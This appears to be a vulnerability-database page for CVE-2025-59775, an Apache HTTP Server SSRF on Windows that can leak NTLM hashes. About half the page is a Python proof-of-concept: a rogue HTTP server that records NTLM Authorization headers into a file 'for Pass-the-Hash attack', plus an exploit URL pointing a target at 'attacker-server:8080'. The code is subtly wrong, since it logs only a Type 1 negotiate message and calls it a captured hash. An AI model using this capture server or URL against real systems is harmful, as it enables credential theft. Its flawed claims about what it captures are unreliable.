Security Vulnerability Report
CVE-2025-59775 CVSS 7.5 HIGH

CVE-2025-59775

Published: 2025-12-05 11:15:52
Last Modified: 2025-12-10 16:40:04

Description

Server-Side Request Forgery (SSRF) vulnerability in Apache HTTP Server on Windows with AllowEncodedSlashes On and MergeSlashes Off allows an attacker to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* - VULNERABLE
Apache HTTP Server 2.4.x < 2.4.66 (Windows, with AllowEncodedSlashes On and MergeSlashes Off)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59775 PoC - Apache SSRF NTLM Hash Leak
# Requires: Apache with AllowEncodedSlashes On and MergeSlashes Off on Windows
# Target must have access to the malicious server
import http.server
import socketserver
import base64
import re


class NTLMCaptureHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the Authorization header containing NTLM hash
        auth_header = self.headers.get('Authorization', '')
        if 'NTLM' in auth_header:
            # Extract the base64 NTLM message the client sent in the Authorization header
            ntlm_match = re.search(r'NTLM ([A-Za-z0-9+/=]+)', auth_header)
            if ntlm_match:
                ntlm_data = base64.b64decode(ntlm_match.group(1))
                print(f'[+] NTLM Hash captured from {self.client_address}')
                print(f'[+] NTLM Type 1: {ntlm_match.group(1)}')
                # Save for Pass-the-Hash attack
                with open('captured_hashes.txt', 'a') as f:
                    f.write(f'{self.client_address[0]}:{ntlm_match.group(1)}\n')
        # Reply 401 and request NTLM authentication
        self.send_response(401)
        self.send_header('WWW-Authenticate', 'NTLM')
        self.send_header('Connection', 'close')
        self.end_headers()

    def log_message(self, format, *args):
        print(f'[*] {self.address_string()} - {format % args}')


class NTLMServer:
    def __init__(self, port=8080):
        self.port = port

    def start(self):
        with socketserver.TCPServer(('', self.port), NTLMCaptureHandler) as httpd:
            print(f'[*] NTLM Capture Server running on port {self.port}')
            print('[*] Waiting for Apache SSRF requests...')
            httpd.serve_forever()


if __name__ == '__main__':
    # Start malicious server to capture NTLM hashes
    server = NTLMServer(port=8080)
    server.start()

# Exploit URL (to be used in SSRF attack):
# http://target-server/%2e%2e/%2e%2e/%2e%2e/http://attacker-server:8080/
```

References

https://httpd.apache.org/security/vulnerabilities_24.html (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/12/04/6 (Issue Tracking, Third Party Advisory)

Weakness

CWE-918